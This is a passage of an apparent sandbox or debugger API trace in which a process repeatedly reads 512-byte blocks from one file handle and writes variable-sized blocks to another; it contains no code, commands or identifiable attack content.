lpOverlapped=0x0) returned 1 [0022.805] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.805] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.806] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x369, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.810] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.817] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.820] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.822] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x321, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.828] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.829] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.831] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x233, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.849] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.849] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.850] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.850] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x219, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.851] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.851] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.852] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x247, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.854] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.854] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.855] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.856] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.856] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.857] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.858] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.859] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.864] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.868] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 